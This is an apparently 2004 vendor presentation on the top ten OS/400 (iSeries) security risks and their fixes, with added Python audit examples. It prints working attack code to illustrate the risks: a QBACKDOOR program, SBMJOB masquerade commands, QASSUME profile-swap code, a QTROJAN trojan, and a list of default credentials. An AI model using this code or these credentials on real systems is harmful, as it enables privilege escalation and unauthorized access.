
Definitive iSeries Security

PRESENTATION

Top 10 OS/400 Security Risks
October 2004

John Earl
Chief Technology Officer
The PowerTech Group

www.powertech.com
john.earl@powertech.com

Copyright (c) 1999 - 2002 The Powertech Group

Copyright & Disclaimer

This information is meant for the edification of the OS/400 user community. It is my sincere desire that you use this information to your advantage and make your systems more secure with it. As with any software modification, you should test the impact of these recommendations before implementing them on production systems. Because every system is potentially different, neither I nor The PowerTech Group can assume any responsibility for any adverse effects of improperly tested implementations.

And finally, to protect our copyright (and out of common courtesy to the author), we respectfully request that you do not reproduce this material in any advertisement, web-site, or other printed format without the express written consent of the copyright holder.

www.powertech.com
info@powertechgroup.com
Copyright (c) 1999 - 2002 The Powertech Group
2003 PowerTech Group, Inc. All rights reserved.

PowerTech/IBM Relationship

> Multi-level
  Executive through developer
> Partner Programs
  System Mgmt Partner Group
  Advanced Development Partner
> Business with Global Services
  Worldwide agreement with IGS
  IGS recommends PowerTech with engagements
  Installed in IBM outsourced clients
> Installed in IBM San Jose, Rochester, NY,



HACKERS!!!
or
Your Company

The Biggest Threat to your Corporate Data

Enterprise Security Evolution


Source Code for a Secret Terrible and Dastardly Hacking Program

> Source code for program QSYS/QBACKDOOR:

    PGM
    CALL QCMD
    ENDPGM

> When compiled to adopt a powerful user's authority, this program is dangerous without limits.


Top 10 OS/400 Security Risks

Agenda
Introduction
The Top 10
  1. User Identity Theft
  2. Powerful Users
  3. System Value Weaknesses
  4. Library and Library List Problems
  5. The Open Door Policy
  6. Promiscuous Object Ownership
  7. Command Interface Abuse
  8. Trojan Horses
  9. No Audit Ability
  10. Unprotected Network Access
Conclusion

User Identity Theft

> There are 5 well known ways to steal an OS/400 User ID. From the difficult to the easy, they are:
  1. Use an OS/400 Job Description to masquerade as the user
  2. Use the Submit Job Command (SBMJOB) to masquerade as the user
  3. Use IBM APIs to switch to the user (no password required)
  4. Sniff network traffic to find clear text passwords
  5. Beg, borrow, steal or guess their password


User Identity Theft

Use an OS/400 Job Description to masquerade as the user.

A JOBD that has a User ID specifically attached to it represents the ability to run a job as that user, without knowing the user's password. This exposure is only for those systems running at OS/400 QSECURITY level 30 and lower.

At QSECURITY level 30 and lower, the user needs only *USE (Read) authority to the Job Description.

Example:
    SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) +
               SRCFILE(MYLIB/QCLSRC) OPTION(*NOSRC) GENOPT(*NOLIST) +
               USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) AUT(*ALL))) +
           JOB(REPORT) JOBD(QGPL/QBATCH) USER(*JOBD)

> Solution? Move to QSECURITY level 40 or higher.

User Identity Theft

Use the Submit Job Command (SBMJOB) to masquerade as the user

The SBMJOB command allows the submitter to specify the name of another user, and have the submitted job run using the assumed identity. All that is required is *USE (Read) authority to the target User Profile object.

Example:
    SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) +
               SRCFILE(MYLIB/QCLSRC) OPTION(*NOSRC) GENOPT(*NOLIST) +
               USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) AUT(*ALL))) +
           JOB(REPORT) JOBD(QGPL/QBATCH) USER(SALLY)


User Identity Theft

Use IBM APIs to switch to the user (no password required)

The following code will allow me to become someone else without knowing their password.

Program QSYS/QASSUME (slide stamped "Censored!!!")

    PGM        PARM(&USER)
    DCL        &USER   *CHAR 10
    DCL        &HANDLE *CHAR 10
    DCL        &ERROR  *CHAR 4
    CHGVAR     %BIN(&ERROR) 0
    CALL       QSYGETPH PARM(&USER *NOPWD &HANDLE &ERROR)
    CHGVAR     %BIN(&ERROR) 0
    CALL       QWTSETP  PARM(&HANDLE &ERROR)
    ENDPGM


User Identity Theft

Sniff network traffic to find clear text passwords

Several protocols submit User IDs and passwords in clear text. Among them are FTP, Telnet, and older forms of Client Access and PC Support.

  Minimize use of the legacy OS/400 Sign-on Screen (QDSIGNON).
  Set the Client Access Bypass Signon flag to yes, and the OS/400 system value QRMTSIGN to *VERIFY.
  Use VPNs when communicating over un-secure networks.


User Identity Theft

Beg, borrow, steal, or guess their password.

Password Protection is the Best Defense!

  AS/400 requires a password in order to access
  A solid password policy will prevent most breaches from the outside and from nefarious insiders too.
  Don't send passwords via email, or over un-secured networks.
  Require that passwords be changed at regular intervals.
  Don't EVER use default passwords.


User Identity Theft

All of the default passwords are well known!

  Subject: alt.2600 FAQ (1/3) #18/
  From: quinny@bigfoot.com
  Forums: alt.2600
  Message segment 18 of 63

  AS/400
  ~~~~~~
  qsecofr   qsecofr    /* master security officer */
  qsysopr   qsysopr    /* system operator */
  qpgmr     qpgmr      /* default programmer */
  ibm       password
  ibm       2222
  ibm       service
  qsecofr   1111111
  qsecofr   2222222
  qserv     qserv
  qsvr      qsvr
  secofr    secofr
  qsrv      ibmce



User Identity Theft

Prevent Trivial Passwords:

At a minimum, set these system values:

  System Value Name   Value   Description
  QPWDEXPITV          90      90 Days
  QPWDMINLEN          6       6 Character Minimum length
  QPWDRQDDGT          1       Require a digit
  QPWDRQDDIF          5       Unique in 10

Don't go too wild with password rules (the QPWD* system values), or your users won't remember their passwords!


Powerful Users

> Users can be made more powerful through the granting of OS/400 Special Authorities.
  Special Authorities can trump OS/400 object level authorities.
  A USER WITH *ALLOBJ CAN READ, CHANGE, OR DELETE ANY OBJECT ON THE SYSTEM.
  A USER WITH *SPLCTL CAN READ, CHANGE, OR DELETE ANY SPOOL FILE ON THE SYSTEM.
  A USER WITH *JOBCTL CAN VIEW, CHANGE, OR STOP ANY JOB ON THE SYSTEM (INCLUDES ENDSBS AND PWRDWNSYS).
  A USER WITH *SAVSYS CAN READ OR DELETE ANY OBJECT ON THE SYSTEM.


Powerful Users

> What do special authorities do?
  *ALLOBJ - ALL authority to every object on the system. Game Over!
  *AUDIT - Authority to manipulate system auditing values.
  *IOSYSCFG - Authority to create and modify communications to the system.
  *JOBCTL - Authority to control other users' jobs.


Powerful Users

> What do special authorities do?
  *SAVRST - Authority to Save, Restore, and remove any object on the system.
  *SECADM - Authority to change Profiles and Passwords.
  *SERVICE - Authority to use the system service tools.
  *SPLCTL - *ALLOBJ authority for spool files.


System Value Weaknesses

There are several system values that must be set properly to protect your system.

  Set the system values to their most protective setting and then toggle them off/on as needed.
  Monitor system values to detect and alert you whenever they are changed.
    Ensure that those system values are changed back.
    Monitor for toggle off / toggle on conditions.
    Monitor what is done while system values are toggled off.


System Value Weaknesses

Signon Control: regulate signon to prevent attacks.

  System Value   Value     Description
  QDSPSGNINF               Display the signon information screen.
  QMAXSIGN                 Maximum invalid signon attempts allowed.
  QMAXSGNACN               Disable user after N invalid signon attempts.
  QINACTITV      30        Time out a screen after 30 idle minutes.
  QINACTMSGQ     *DSCJOB   When job is timed out, disconnect job and show signon screen.
  QRMTSIGN       *VERIFY   Allow user to bypass legacy signon screen.


System Value Weaknesses

Malicious Programs: prevent malicious programs from being loaded to your system by setting these system values:

  System Value   Value    Description
  QALWOBJRST     *NONE    Do not allow sensitive program restore.
  QVFYOBJRST              Signed objects must be valid upon restore.
  QFRCCVNRST              Force object conversion on restore.


System Value Weaknesses

Operating System Integrity Setting: use these settings to ensure system integrity at all times:

  QSECURITY = 40 or 50    Do not allow programs to bypass OS security.

QSECURITY supports 5 levels:
  10 = Physical Security
  20 = Password Security
  30 = Resource Security
  40 = Operating System Security
  50 = Enhanced Operating System Security
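An added example (not the deck's own code) that turns the password rules from the User Identity Theft section and the signon, restore, QSECURITY and audit settings from these System Value Weaknesses slides into one check: it parses a constructed "NAME VALUE" dump of system values and reports every value weaker than the recommendations. The dump format, parse_dump and check_system_values are assumptions of this example, not an IBM interface.

```python
# Added example, not from the PowerTech deck: audit a system-value dump against the settings
# this presentation recommends. The "NAME VALUE" input format and SAMPLE_DUMP are constructed.
from typing import Dict, List, Optional, Tuple

SAMPLE_DUMP = """\
# constructed sample, deliberately mixing weak and acceptable settings
QSECURITY   30
QPWDEXPITV  *NOMAX
QPWDMINLEN  6
QPWDRQDDGT  0
QPWDRQDDIF  0
QDSPSGNINF  0
QMAXSIGN    *NOMAX
QMAXSGNACN  1
QINACTITV   30
QINACTMSGQ  *DSCJOB
QRMTSIGN    *FRCSIGNON
QALWOBJRST  *ALL
QAUDCTL     *NONE
QAUDENDACN  *PWRDWNSYS
"""

def parse_dump(text: str) -> Dict[str, str]:
    """Parse 'NAME VALUE...' lines into {NAME: VALUE}; blank lines and '#' comments are skipped."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) == 2 and not parts[0].startswith("#"):
            values[parts[0].upper()] = parts[1].strip().upper()
    return values

def check_system_values(text: str) -> List[Tuple[str, str]]:
    """Return (system value, finding) pairs for every value weaker than the deck recommends."""
    sv = parse_dump(text)
    findings: List[Tuple[str, str]] = []

    def val(name: str) -> str:
        return sv.get(name, "<missing>")

    def num(name: str) -> Optional[int]:
        return int(val(name)) if val(name).isdigit() else None  # None for *NOMAX, *NONE, missing

    def flag(name: str, why: str) -> None:
        findings.append((name, f"{name}={val(name)}: {why}"))

    # Operating system integrity: level 40 or 50 also closes the JOBD USER(*JOBD) exposure.
    if (num("QSECURITY") or 0) < 40:
        flag("QSECURITY", "run at 40 or 50 so programs cannot bypass OS security")
    # Password rules from the deck's table: 90-day expiry, 6 characters, a digit, unique in 10.
    if num("QPWDEXPITV") is None or num("QPWDEXPITV") > 90:
        flag("QPWDEXPITV", "expire passwords at 90 days or less, never *NOMAX")
    if (num("QPWDMINLEN") or 0) < 6:
        flag("QPWDMINLEN", "require at least 6 characters")
    if val("QPWDRQDDGT") != "1":
        flag("QPWDRQDDGT", "require a digit")
    if val("QPWDRQDDIF") not in {"1", "2", "3", "4", "5"}:  # 5 = differ from last 10; 1-4 stricter
        flag("QPWDRQDDIF", "reject reuse of the last 10 passwords (value 5) or stricter")
    # Signon control: show signon info, cap invalid attempts, disable the profile, time out idle screens.
    if val("QDSPSGNINF") != "1":
        flag("QDSPSGNINF", "display the signon information screen")
    if num("QMAXSIGN") is None:
        flag("QMAXSIGN", "set a maximum number of invalid signon attempts")
    if val("QMAXSGNACN") not in {"2", "3"}:  # 2 = disable profile, 3 = disable it and vary off device
        flag("QMAXSGNACN", "disable the user profile after too many invalid attempts")
    if num("QINACTITV") is None or num("QINACTITV") > 30:
        flag("QINACTITV", "time out idle screens after 30 minutes or less")
    if val("QINACTMSGQ") != "*DSCJOB":
        flag("QINACTMSGQ", "disconnect timed-out jobs back to the signon screen")
    if val("QRMTSIGN") != "*VERIFY":
        flag("QRMTSIGN", "let verified clients bypass the legacy signon screen")
    # Malicious program restore and audit ability.
    if val("QALWOBJRST") != "*NONE":
        flag("QALWOBJRST", "do not allow sensitive program restore")
    if "*AUDLVL" not in val("QAUDCTL").split():
        flag("QAUDCTL", "turn on action auditing to QAUDJRN")
    if val("QAUDENDACN") != "*NOTIFY":
        flag("QAUDENDACN", "use *NOTIFY so an auditing failure is reported instead of powering down")
    return findings
```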


Libraries and Library Lists

Libraries are collections of data that a user can access.

  If a user has *EXCLUDE authority to a library, they cannot access anything in that library.
  If a user has *USE authority to a library, they can read, change, or delete objects in that library, assuming they have authority to the object itself.
  A user with *USE plus *ADD authority can place new objects into a library.
  A user with *ALL authority can delete the library.

Libraries are your first line of defense.
  Grant users no more than *USE authority to production libraries.
  Specify *EXCLUDE for sensitive libraries.

Libraries and Library Lists

A library list specifies the order in which objects and files are searched for. The ability to place objects in a library that is higher on the library list (assuming *USE plus *ADD capability) represents the ability to skirt many security designs.

Example:
  If the library list contains LIBA, LIBB, and LIBC,
  and security checking program PROGZ exists in LIBC,
  and user Fred has *USE + *ADD authority to LIBA,
  user Fred could place a bogus version of PROGZ into LIBA that bypasses security.

Solution:
  Users only need *USE authority to libraries in their library list. This is especially true of libraries on the system portion of the library list (System Value QSYSLIBL).
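Working through the LIBA/LIBB/LIBC scenario above in code, as an added example that is not from the presentation: the library contents, library list, user names and authorities below are constructed to match the slide, and the helper names (resolve, can_add, shadowers, simulate_plant) are this example's own.

```python
# Added example, not from the deck: a model of OS/400 library-list resolution that finds
# who could plant a same-named object ahead of a security program. LIBRARIES, LIBL,
# AUTHORITY and the user names are constructed to match the slide's scenario.
from typing import Dict, List, Optional, Set

# Constructed inventory: library -> objects it holds. PROGZ is the security-checking program.
LIBRARIES: Dict[str, Set[str]] = {
    "LIBA": {"RPTPGM"},
    "LIBB": {"INVPGM"},
    "LIBC": {"PROGZ", "ORDPGM"},
}
# Constructed library list, searched front to back (system portion first, then user portion).
LIBL: List[str] = ["QSYS", "LIBA", "LIBB", "LIBC"]
# Constructed authorities: user -> library -> authorities held (*USE, *ADD, *ALL, *EXCLUDE).
AUTHORITY: Dict[str, Dict[str, Set[str]]] = {
    "FRED": {"LIBA": {"*USE", "*ADD"}, "LIBB": {"*USE"}, "LIBC": {"*USE"}},
    "SALLY": {"LIBA": {"*USE"}, "LIBB": {"*USE"}, "LIBC": {"*USE"}},
}


def resolve(name: str, libl: List[str], libs: Dict[str, Set[str]] = LIBRARIES) -> Optional[str]:
    """An unqualified call (CALL PROGZ) runs the copy in the FIRST library on the list that has one."""
    for lib in libl:
        if name in libs.get(lib, set()):
            return lib
    return None


def can_add(user: str, lib: str, auth: Dict[str, Dict[str, Set[str]]] = AUTHORITY) -> bool:
    """*USE plus *ADD (or *ALL) on a library lets a user place new objects into it."""
    held = auth.get(user, {}).get(lib, set())
    return "*ALL" in held or {"*USE", "*ADD"} <= held


def shadowers(name: str, libl: List[str], libs=LIBRARIES, auth=AUTHORITY) -> Dict[str, List[str]]:
    """Map each user to the libraries, searched BEFORE the one that legitimately holds `name`,
    into which they could drop a bogus copy. An empty dict means nobody can skirt the check."""
    home = resolve(name, libl, libs)
    if home is None:
        return {}
    ahead = libl[: libl.index(home)]
    exposed: Dict[str, List[str]] = {}
    for user in auth:
        spots = [lib for lib in ahead if can_add(user, lib, auth)]
        if spots:
            exposed[user] = spots
    return exposed


def simulate_plant(user: str, name: str, lib: str, libl=LIBL, libs=LIBRARIES, auth=AUTHORITY) -> Optional[str]:
    """Which library would serve `name` after `user` tries to create a copy in `lib`?
    Library authority is enforced first, so a user holding only *USE changes nothing."""
    if not can_add(user, lib, auth):
        return resolve(name, libl, libs)
    planted = {k: set(v) for k, v in libs.items()}
    planted.setdefault(lib, set()).add(name)
    return resolve(name, libl, planted)
```

Running shadowers over every program in the system portion of the library list (QSYSLIBL) is the audit the slide's solution asks for: any user listed there holds more than *USE where they should not.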


The Open Door Policy

> Every OS/400 object specifies some kind of authority for a user called *PUBLIC.

WHO IS *PUBLIC?
Any user of this computer who does not have explicit authority to a given object.

  In the old days *PUBLIC was everyone in my company.
  Then as we networked to more and more systems, *PUBLIC became everyone you do business with (Customers, Vendors, Partners, etc.).
  With virtually every network connected to every other network (it's called The Internet!), *PUBLIC could be anyone in the WORLD that can connect to your network!!!
  In a perfect world, *PUBLIC should have little or no authority to production applications.


The Open Door Policy

> At a maximum, Business Application users need no more than:
  *USE authority to static objects such as: Programs, Display Files, Print Files, Work Management Objects, etc. All static objects (those that do not contain data in one form or another) will work for users that have only change.
  *CHANGE authority to dynamic objects such as: Data Files, Data Areas, Data Queues, Message Queues, etc. Those things that regularly change as a matter of normal business.

> But ideally, don't give *PUBLIC even read (*USE) authority to anything that you wouldn't want published on the Internet tonight.
> Look at the QCRTAUT system value to see what authority *PUBLIC is given by default to newly created objects.

Promiscuous Object Ownership

> Promiscuous Object Ownership is where end users belong to a group profile that owns all of the application objects.
  This plan makes it easy to administer security because everyone has all rights based solely on their membership in the ownership group.
  This plan often assumes that all application access will take place through a predefined menu interface, thereby restricting what a user can actually see and change.


Promiscuous Object Ownership

> Why is this a problem?
  Users are no longer locked into green screen interfaces and dumb terminals.
  There are numerous ways of getting at the data:
    Command line access
    DFU, DBU, EZView and other data manipulation tools
    QUERY/400, SQL, and other query tools
    Others???

Make sure that you've got all the back doors (and Windows!) covered as well.


Command Line Interface Abuse

> The ability to execute commands allows a user to skirt traditional menu limitations.

Commands can be entered in a variety of ways:
  1. OS/400 Command line (CALL QCMD)
  2. OS/400 screens that display a command line (WRKOUTQ, WRKWTR etc.), or other applications with hidden command line access keys.
  3. Through the use of the Attention Key.
  4. Using FTP to issue a command remotely.
  5. Using DDM to issue a command remotely.
  6. Using Client Access to issue a command remotely.


Command Line Interface Abuse

> Control users' access to commands by:
  Use the Limited Capability parameter (LMTCPB) on the OS/400 user profile to limit items 1-4 on the previous page.
  Beware that items 5 and 6 on the previous page do not adhere to the LMTCPB parameter limitations.
    (Assuming OS/400 V4R2 or higher.)
  Use an exit program to limit DDM and Client Access commands.
  Some users will still require command line access: Programmers, Operators, Vendors, and selected Power Users.



Command Line Interface Abuse
(screen shot slide)


A Trojan Horse

> Program QSYS/QTROJAN (slide stamped "Censored!!!")

    QSYS/DCL        &ALLOBJ *CHAR 10
    QSYS/DCL        &COUNT  *DEC (3 0)
    QSYS/DCL        &SPCAUT *CHAR 100
    QSYS/DCL        &START  *DEC (3 0) VALUE(1)
    QSYS/MONMSG     CPF0000
    QSYS/RTVUSRPRF  SPCAUT(&SPCAUT)
    LOOP: IF        (&COUNT *LE 10)
    QSYS/CHGVAR     VAR(&ALLOBJ) VALUE(%SST(&SPCAUT &START 10))
    QSYS/IF         COND(&ALLOBJ = 'ALLOBJ') THEN(DO)
    QSYS/CRTCLPGM   PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) +
                    OPTION(*NOSRC) GENOPT(*NOLIST) +
                    USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) +
                    AUT(*ALL)
    QSYS/RETURN
    QSYS/ENDDO
    QSYS/CHGVAR     VAR(&COUNT) VALUE(&COUNT + 1)
    QSYS/CHGVAR     VAR(&START) VALUE(&START + 10)
    QSYS/GOTO       LOOP


Trojan Horses

> A malicious person who hides a Trojan Horse on your system will (generally) have the following goals:
  Have the program assume high levels of authority
  Be able to run the program at will
  Hide the program from the system administrators
  Have the program execute often, and by a variety of users.

> An IBM exit point program that can be deleted (and/or replaced) by someone other than the System Administrator represents an opportunity for a Trojan Horse.
> *USE authority is sufficient to run these exit programs. Anything more, and you are at risk of introducing a Trojan Horse.

Trojan Horses

> System Values (WRKSYSVAL)
  QATNPGM    - Attention program
  QPWDVLDPGM - Password validation program
  QRMTSIGN   - Remote sign-on control
  QSTRUPPGM  - Startup program

> Network Values (CHGNETA)
  PCSACC - PC Support exit point
  DDMACC - DDM exit point

> Registration Info (WRKREGINF)
  ADDEXITPRG - Add Exit Program
  Hundreds of program opportunities here


Trojan Horses

> Message Files (CHGMSGD)
  DFTPGM parameter allows a default handling program.
  10s of thousands of Message Queues.

> Subsystems (CHGSBSD)
  Routing and Communication Entries contain program names.

> Database Triggers (ADDPFTRG)
  Use PRTTRGPGM to monitor trigger usage

> Command Exit Programs
  Monitor command exits (V4R5) and validation programs
  Over 2000 OS/400 commands


No Audit Ability

> If you had a security problem, would you know?
  Who did it?
  What happened?
  When it happened?
  How it was done?
  How to stop it from happening again?

> What if the data was not damaged, but only stolen?


No Audit Ability

> In order to prevent security breaches, you must first be able to detect them.
> Use the OS/400 security auditing journal (QAUDJRN) to help determine where your security stands.

Why?
  It's free (from IBM)
  It's a comprehensive gathering tool
  It's an irrefutable source of historical events.


No Audit Ability

> Turn on OS/400 Security Auditing by typing:

    CHGSECAUD QAUDCTL(*AUDLVL) +
              QAUDLVL(*AUTFAIL *CREATE *DELETE +
                      *JOBDTA *NETCMN *OBJMGT +
                      *OFCSRV *OPTICAL *PGMADP +
                      *PGMFAIL *PRTDTA *SAVRST +
                      *SECURITY *SERVICE *SPLFDTA +
                      *SYSMGT) +
              INLJRNRCV(SECURLIB/AUDRCV0001)

> This will generate a lot of audit trails.
> Use tools to sift through the audit trails to find important events.
> If at all possible, save all security journal receivers.
> Make sure QAUDENDACN is *NOTIFY.

10. Unprotected Network Access

> Some facts about iSeries Security
  DB2/400 database is integrated with the operating system.
  Users have all of the authority that their group IDs carry, and in many purchased software applications, Group IDs own the application data.
  OS/400 ships with all of its TCP/IP services turned on. These network services provide authorized users access to application data.
  If you do not have Exit Programs in place, you likely are at risk of sharing OS/400 data with every user on your network.
  PowerLock NetworkSecurity is an iSeries host based Access Control and Monitoring software package that protects application data from too-powerful users.


10. Unprotected Network Access

> Most AS/400s rely on menu security
  It was easy to build
  It's the legacy of many S36 and S/38 applications

> Most menu security designs assume:
  All access is through the application menu.
  No users have command line access.
  Query access is limited or denied completely.
  That the user is a member of the group that owns the objects, or *PUBLIC has broad access to the data.


10. Unprotected Network Access

> Menu Security is no longer relevant in a networked environment.
  Users are all using PCs, not dumb terminals.
  PCs have sophisticated data access tools like FTP, ODBC, Remote Command and more.
  End users are much more sophisticated; many hit the workforce with a pre-existing familiarity with these tools.

> Don't believe that the 5250 green screen is the end of your security responsibility.

10. Result: Too Much Access

(Diagram: Application Menu / CRM)


10. Unprotected Network Access

(Diagram slide)

10. Unprotected Network Access

Some of the network access methods:

  CLIENT ACCESS/400*
    Get File transfer
    Put File Transfer
    Remote Command
    ODBC
    Data Queue access
  FTP
    Get File
    Put File
    Delete File
    Delete Library
    Remote Command
  NetServer
    Windows Network Neighborhood
    Shared Folders
    Shared Printers
  DDM
    Copy File
    Remote Command
  DRDA
  Shared Folders
  Etc.

There are over 250 access points to an iSeries database!



10. Unprotected Network Access

How do you regulate network access to data?

> Implement Exit Programs on network access points like FTP, ODBC, DDM, etc.
  Exit Programs:
    Will protect systems that are reliant solely on menu security.
    Can be used to limit what trading partners can see when they access your system.
    Monitor access that normally flies beneath your radar.
    Stop unwanted activity even when you're not around.
    Provide defense in depth security beyond traditional controls.


10. Unprotected Network Access

What is an exit point anyway?

A point in a process where control can be passed to a user-supplied program. The user-supplied program can usually perform processing that overrides or complements the processing done by the main process.

  Main program (IBM's FTP Server)             User specified exit program
  1. User requests data
  2. FTP Server calls exit program    -->     Analyze request & return result (pass/fail)
  3. Exit Program returns result      <--
  Continue processing...
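The pass/fail exchange in the diagram above, modelled in Python as an added example that is neither IBM's exit-program interface nor PowerTech's product: the Request fields, the POLICY rules and every user, library and address are constructed, and a real exit program is a compiled program that the FTP server calls with its own request structure.

```python
# Added example, not PowerTech's product and not IBM's exit interface: a model of the
# pass/fail decision an FTP server request exit program makes, with the audit trail the
# deck says exit programs give you. Request fields, POLICY and all names are constructed.
from dataclasses import dataclass, field
from typing import List, Set


@dataclass(frozen=True)
class Request:
    """What the server hands the exit program before it performs the operation."""
    user: str        # profile the FTP server already authenticated
    operation: str   # GET, PUT, DELETE, DELETELIB, RCMD (remote command), ...
    library: str     # library or directory named in the request
    obj: str         # file / member / command text
    client_ip: str   # constructed address


@dataclass(frozen=True)
class Rule:
    user: str              # profile name, or "*PUBLIC" for every user
    operations: Set[str]   # operations this rule permits
    libraries: Set[str]    # libraries it permits them in; "*ALL" matches any


# Constructed policy: a trading partner may only pull its own EDI output, an internal user
# may move report files, and there is no catch-all *PUBLIC grant (so the default is FAIL).
POLICY: List[Rule] = [
    Rule("PARTNERX", {"GET"}, {"EDIOUT"}),
    Rule("SALLY", {"GET", "PUT"}, {"REPORTS"}),
]


@dataclass
class ExitProgram:
    policy: List[Rule]
    audit: List[str] = field(default_factory=list)

    def allows(self, r: Request) -> bool:
        """PASS only if some rule for this user (or *PUBLIC) covers the operation and library.
        OS/400 object authority is still checked afterwards: this is a layer on top of it,
        which is what makes it useful on systems that relied on menu security alone."""
        return any(
            rule.user in (r.user, "*PUBLIC")
            and r.operation in rule.operations
            and ("*ALL" in rule.libraries or r.library in rule.libraries)
            for rule in self.policy
        )

    def decide(self, r: Request) -> bool:
        """The exit entry point: log every request, grants and denials alike, then return the verdict."""
        verdict = self.allows(r)
        self.audit.append(
            f"FTP {'PASS' if verdict else 'FAIL'} user={r.user} op={r.operation} "
            f"target={r.library}/{r.obj} from={r.client_ip}"
        )
        return verdict

    def denials(self) -> List[str]:
        """The lines worth alerting on: activity that would otherwise fly beneath the radar."""
        return [line for line in self.audit if line.startswith("FTP FAIL")]
```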

10. iSeries Network Access with Network Security in Place

  FTP Server        \
  TELNET Server      |
  Database Server    |
  DDM Server         |--> EXIT PROGRAM
  SQL Server         |
  DRDA Server        |
  File xfer Server  /

Network Security software that controls and monitors access to the iSeries through the network interfaces.

10. Prevent Data Theft and Loss

(Diagram: DISTRIBUTORS, EMPLOYEES, SUPPLIERS)

Provides:
  Visibility to network activity
  Control of network activity
  Security monitoring

Conclusions

> Security on OS/400 doesn't just happen, you have to make it happen.
> OS/400 has the best security tools available, so let's use them.
> You can't play in e-business unless you guard against network access.
> If you are compromised, will you know?
> Secure network access points before someone else discovers the exposure.

Thank You

Contact Info:
John Earl
Chief Technology Officer
The PowerTech Group
john.earl@powertech.com
253.872.7788 x302
